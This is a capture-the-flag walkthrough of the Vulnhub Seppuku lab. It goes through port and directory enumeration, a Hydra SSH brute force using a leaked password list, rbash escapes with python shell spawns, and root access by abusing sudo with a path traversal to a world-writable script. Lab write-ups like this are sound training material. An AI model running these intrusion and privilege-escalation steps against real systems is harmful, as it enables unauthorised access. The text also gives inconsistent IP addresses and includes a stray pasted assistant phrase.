Seppuku offsec Walkthrough
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researchers || TryHacMe Top 1% ||Programing C,Python || Bug Bounty ||
The Seppuku Offsec lab is a virtual penetration testing environment available on Vulnhub, designed to simulate real-world scenarios for practicing penetration testing. It's known for its intermediate to hard difficulty level and offers a variety of challenges to test your skills in reconnaissance, enumeration, exploitation, and privilege escalation.
Steps to complete Seppuku:
1. Reconnaissance:
- Use tools like Netdiscover and Nmap to identify the host IP and enumerate open ports. You'll typically find services running on ports such as FTP (21), SSH (22), HTTP (80), and several others.
2. Enumeration:
- Perform directory brute-forcing using tools like Dirb or GoBuster to find hidden directories and files on the web server. Key directories such as /keys and /secret often contain crucial information like SSH private keys and password lists.
3. Exploitation:
- Utilize the information gathered during enumeration to brute force SSH login using tools like Hydra. For instance, if you find a username and password list, you can use them to gain SSH access to the target machine.
4. Privilege Escalation:
- After gaining initial access, look for ways to escalate privileges. This might involve abusing sudo permissions or finding other users' credentials. For example, you might find hidden files that contain passwords for higher-privilege accounts, or exploit sudo rights to execute commands as the root user.
The Seppuku lab emphasizes learning through practical application of various penetration testing techniques, making it a valuable resource for both beginners and experienced security professionals.
reconnaissance:
Always we start with network scanning first we scan network using Rustscan scan.
we used rustscan for port enumeration. We found that port 21 for ftp, port 22 for ssh, port 80 for http, 139 and 445 for NetBIOS-ssh, port 7080 for SSL/http, port 7601 for http, port 8088 for http.
Enumeration
Sure, here's the revised version:
To gather more details, we need to begin enumerating the host machine. Given that port 7601 is open, I turned to the browser and explored the target IP 192.168.1.104. However, this search yielded no useful information.
Then I ran gobuster. I could not find any host on port 80 so I tried port 7601.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://192.168.191.90:7601
After running gobuster, we found many hidden directories like key, secret and by visiting each directory we got many sensitive information.
First I went to https://192.68.191.91:7601/production but I did not find any hidden information
Then I went to the secret and showed the key and I got a lot of information.
/secret
Open hostname
I went into all the folders one by one and found a hostname.
open jack.jpg
open passwd.bk
After downloading passwd.bk.
Open password.lst.
I got a password.lst file which I copied and saved in my Linus system to further force the password.
nano password.txt
Then visited key .
And in downloaded private key I got RSA through which we can login using SSH without password. {Save it nano indorse}
Exploitation:
Now that we have a password wordlist and the target machine's hostname, we can use this wordlist to brute-force the SSH password.
hydra -l seppuku -P password.txt 192.168.191.90 ssh
username and password seppuku:eeyoree
After logging in, let's proceed with further investigation to find hidden files. We discovered a hidden file called .passwd, which provided us with a password, though its purpose is currently unknown.
Next, we attempted to enter the home directory but were unable to do so due to the restricted rbash shell.
I found a password here.
User flag:
I noticed that the cd command is not working. Then I ran this command
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then work cd command:
cd /home
ls -la
I found here there are many users like tanto, samurai, seppuku.
I tried to do tanto login ssh. But I didn't succeed. Then I remembered that I had found a private file which had rsa key.
Then Login with RSA key. To login with RSA, I first had to give permissions to it.
again we see rbash restrict error again we bypass the rbash shell our previous python command for checking privilege escalation we run the sudo -l command and here we found script entry without the password .
python -c 'import os; os.system("/bin/bash");'
sudo -l
I logged in SSH with samurai user.
Privilege Escalation
Now that we have read-write permissions in the user's home directory, we first create a .cgi_bin directory. Then, we move to the cgi directory and use the cat command to create a simple bash file, adding full permissions for everyone to read, write, and execute the file.
After logging in as tanto, we searched for the .cgi_bin directory, which would be executed through the sudo user. Unfortunately, we couldn't find this directory, so we created a directory named .cgi_bin and saved the bash script in a file named "bin" to obtain a bash shell through it.
mkdir .cgi_bin
cd .cgi_bin/
echo "/bin/bash" > bin
chmod 777 bin
ls -la
Now it was time to exploit .cgi_bin program, thus again we logged as Samurai and run the following command and obtain the root shell and finished the challenge by capturing the root flag.
sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*
cd /root
ls
cat proof.txt
Root Flag :
Thanks for reading: